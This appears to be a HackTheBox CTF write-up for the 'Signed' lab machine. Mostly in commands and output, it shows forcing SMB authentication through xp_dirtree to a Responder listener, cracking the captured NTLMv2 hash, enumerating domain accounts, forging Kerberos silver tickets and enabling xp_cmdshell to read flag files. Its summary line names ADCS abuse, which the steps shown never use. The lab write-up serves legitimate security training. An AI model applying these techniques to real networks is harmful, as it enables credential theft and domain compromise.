WriteupsHTB — Signed
ADMediumWindows
HTB — Signed
MSSQL with xp_cmdshell for initial RCE. Active Directory certificate abuse (ADCS) to impersonate Domain Admin.
November 20, 2025HackTheBox
#AD#MSSQL#ADCS#Certificate Abuse
mssql
As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH
dirtree
sh
impacket-mssqlclient scott@DC01.SIGNED.HTB
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott guest@master)> EXEC master..xp_dirtree '\\10.10.14.4\share\'
subdirectory depth
------------ -----
responder
sh
sudo responder -I tun0 127 ↵
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.4]
Responder IPv6 [dead:beef:2::1002]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-7FY2RXLEYTB]
Responder Domain Name [FCHO.LOCAL]
Responder DCE-RPC Port [48929]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:f1cbcfcdcc79e32a:BF0C8D8358A4469EF1BC5A87BB5FFA72:010100000000000080277C72B93BDC01330E53E88034258B00000000020008004600430048004F0001001E00570049004E002D003700460059003200520058004C00450059005400420004003400570049004E002D003700460059003200520058004C0045005900540042002E004600430048004F002E004C004F00430041004C00030014004600430048004F002E004C004F00430041004C00050014004600430048004F002E004C004F00430041004C000700080080277C72B93BDC0106000400020000000800300030000000000000000000000000300000B0FA65DCA3D0EABC1D96704321C82D7E8B6D6AEC2F64627670FC7FA4DDC91EEC0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0034000000000000000000hashcat
sh
hashcat -m 5600 mssqlsvc_ntlmv2.hash /usr/share/wordlists/rockyou.txt
MSSQLSVC::SIGNED:f1cbcfcdcc79e32a:bf0c8d83...:010100000000000080277c72b93bdc01330e53e88034258b00000000020008004600430048004f0001001e00570049004e002d003700460059003200520058004c00450059005400420004003400570049004e002d003700460059003200520058004c0045005900540042002e004600430048004f002e004c004f00430041004c00030014004600430048004f002e004c004f00430041004c00050014004600430048004f002e004c004f00430041004c000700080080277c72b93bdc0106000400020000000800300030000000000000000000000000300000b0fa65dca3d0eabc1d96704321c82d7e8b6d6aec2f64627670fc7fa4ddc91eec0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0034000000000000000000:purPLE9795!@
sh
impacket-mssqlclient mssqlsvc@DC01.SIGNED.HTB -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
Password: purPLE9795!@
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commandsmssql domain user enum
sh
[msf](Jobs:0 Agents:0) >> use auxiliary/admin/mssql/mssql_enum_domain_accounts
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set rhosts 10.10.11.90
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set username mssqlsvc
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set password purPLE9795!@
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set use_windows_authent truesh
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> run
[*] Running module against 10.10.11.90
[*] 10.10.11.90:1433 - Attempting to connect to the database server at 10.10.11.90:1433 as mssqlsvc...
[+] 10.10.11.90:1433 - Connected.
[*] 10.10.11.90:1433 - SQL Server Name: DC01
[*] 10.10.11.90:1433 - Domain Name: SIGNED
[+] 10.10.11.90:1433 - Found the domain sid: 0105000000000005150000005b7bb0f398aa2245ad4a1ca4
[*] 10.10.11.90:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.10.11.90:1433 - - SIGNED\Administrator
[*] 10.10.11.90:1433 - - SIGNED\Guest
[*] 10.10.11.90:1433 - - SIGNED\krbtgt
[*] 10.10.11.90:1433 - - SIGNED\Domain Admins
[*] 10.10.11.90:1433 - - SIGNED\Domain Users
[*] 10.10.11.90:1433 - - SIGNED\Domain Guests
[*] 10.10.11.90:1433 - - SIGNED\Domain Computers
[*] 10.10.11.90:1433 - - SIGNED\Domain Controllers
[*] 10.10.11.90:1433 - - SIGNED\Cert Publishers
[*] 10.10.11.90:1433 - - SIGNED\Schema Admins
[*] 10.10.11.90:1433 - - SIGNED\Enterprise Admins
[*] 10.10.11.90:1433 - - SIGNED\Group Policy Creator Owners
[*] 10.10.11.90:1433 - - SIGNED\Read-only Domain Controllers
[*] 10.10.11.90:1433 - - SIGNED\Cloneable Domain Controllers
[*] 10.10.11.90:1433 - - SIGNED\Protected Users
[*] 10.10.11.90:1433 - - SIGNED\Key Admins
[*] 10.10.11.90:1433 - - SIGNED\Enterprise Key Admins
[*] 10.10.11.90:1433 - - SIGNED\RAS and IAS Servers
[*] 10.10.11.90:1433 - - SIGNED\Allowed RODC Password Replication Group
[*] 10.10.11.90:1433 - - SIGNED\Denied RODC Password Replication Group
[*] 10.10.11.90:1433 - - SIGNED\DC01$
[*] 10.10.11.90:1433 - - SIGNED\DnsAdmins
[*] 10.10.11.90:1433 - - SIGNED\DnsUpdateProxy
[*] 10.10.11.90:1433 - - SIGNED\mssqlsvc
[*] 10.10.11.90:1433 - - SIGNED\HR
[*] 10.10.11.90:1433 - - SIGNED\IT
[*] 10.10.11.90:1433 - - SIGNED\Finance
[*] 10.10.11.90:1433 - - SIGNED\Developers
[*] 10.10.11.90:1433 - - SIGNED\Support
[*] 10.10.11.90:1433 - - SIGNED\oliver.mills
[*] 10.10.11.90:1433 - - SIGNED\emma.clark
[*] 10.10.11.90:1433 - - SIGNED\liam.wright
[*] 10.10.11.90:1433 - - SIGNED\noah.adams
[*] 10.10.11.90:1433 - - SIGNED\ava.morris
[*] 10.10.11.90:1433 - - SIGNED\sophia.turner
[*] 10.10.11.90:1433 - - SIGNED\james.morgan
[*] 10.10.11.90:1433 - - SIGNED\mia.cooper
[*] 10.10.11.90:1433 - - SIGNED\elijah.brooks
[*] 10.10.11.90:1433 - - SIGNED\isabella.evans
[*] 10.10.11.90:1433 - - SIGNED\lucas.murphy
[*] 10.10.11.90:1433 - - SIGNED\william.johnson
[*] 10.10.11.90:1433 - - SIGNED\charlotte.price
[*] 10.10.11.90:1433 - - SIGNED\henry.bennett
[*] 10.10.11.90:1433 - - SIGNED\amelia.kelly
[*] 10.10.11.90:1433 - - SIGNED\jackson.gray
[*] 10.10.11.90:1433 - - SIGNED\harper.diaz
[*] 10.10.11.90:1433 - - SIGNED\SQLServer2005SQLBrowserUser$DC01enum_logins
sh
----
SQL (SIGNED\mssqlsvc guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
SIGNED\IT WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
scott SQL_LOGIN 0 0 0 0 0 0 0 0 0
SIGNED\Domain Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
Retrieve the Domain's SID
sh
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\mssqlsvc'); ----------------------------------------------------------- b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'sh
SQL (SIGNED\mssqlsvc guest@master)> SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\mssqlsvc')) AS HexSID;
HexSID
----------------------------------------------------------
0x0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000 python
python3
Python 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> h="0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
>>> b=bytes.fromhex(h)
>>> rev=b[0];cnt=b[1];id_auth=int.from_bytes(b[2:8],'big')
>>> subs=[str(int.from_bytes(b[8+i*4:12+i*4],'little')) for i in range(cnt)]
>>> print(f"S-{rev}-{id_auth}-" + "-".join(subs))
S-1-5-21-4088429403-1159899800-2753317549-1103sh
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\IT');
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000' sh
python3
Python 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
h="0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
b=bytes.fromhex(h)
rev=b[0];cnt=b[1];id_auth=int.from_bytes(b[2:8],'big')
subs=[str(int.from_bytes(b[8+i*4:12+i*4],'little')) for i in range(cnt)]
print(f"S-{rev}-{id_auth}-" + "-".join(subs))
S-1-5-21-4088429403-1159899800-2753317549-1105convert mssql password to nthashor md4
sh
echo -n 'purPLE9795!@' | iconv -f utf8 -t utf16le | openssl dgst -md4
MD4(stdin)= ef699384...Create a Silver Ticket with ticketer.py
sh
impacket-ticketer -nthash ef699384... -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.SIGNED.HTB:1433 -groups 1105 -user-id 500 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccacheImporting the Ticket and using it
sh
export KRB5CCNAME=./Administrator.ccachesh
impacket-mssqlclient -k -no-pass administrator@DC01.SIGNED.HTB -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\Administrator dbo@master)> part of the sysadmin role
sh
SQL (SIGNED\Administrator dbo@master)> SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
SIGNED\Administrator
1 sh
SQL (SIGNED\Administrator dbo@master)> EXECUTE sp_configure 'show advanced options', 1
SQL (SIGNED\Administrator dbo@master)> RECONFIGURE
SQL (SIGNED\Administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
SQL (SIGNED\Administrator dbo@master)> RECONFIGUREsh
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "whoami"
output
---------------
signed\mssqlsvc
NULLuser.txt
sh
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "type C:\users\mssqlsvc\desktop\user.txt"
output
--------------------------------
e9753b73...
NULL priv esc
sh
impacket-ticketer -nthash ef699384... -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.SIGNED.HTB:1433 -groups 512,519,1105 -user-id 1103 mssqlsvcsh
export KRB5CCNAME=/home/sake/htb/seasonal/Signed/mssqlsvc.ccachesh
impacket-mssqlclient -k -no-pass mssqlsvc@DC01.SIGNED.HTB -windows-authsh
SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:/users/administrator/desktop/root.txt', SINGLE_CLOB) AS Contents
BulkColumn
---------------------------------------
b'3bc7536f...\r\n' Up next
MediumDec 2025
HTB — TombWatcher
Active Directory with ADCS misconfiguration. ESC1 certificate template abuse allows requesting a certificate as Domain Admin for full compromise.
Read writeup
MediumJan 2026
HTB — Haze
Splunk misconfiguration leaks credentials. Active Directory enumeration reveals a privilege escalation path through ACL abuse to Domain Admin.
Read writeup
MediumJan 2026
Wiz Bug Bounty
Bug bounty masterclass covering exposed databases, SSRF, subdomain takeover, blind XSS, GitHub secret leaks, Spring Boot heapdump, and session confusion ATO.
Read writeup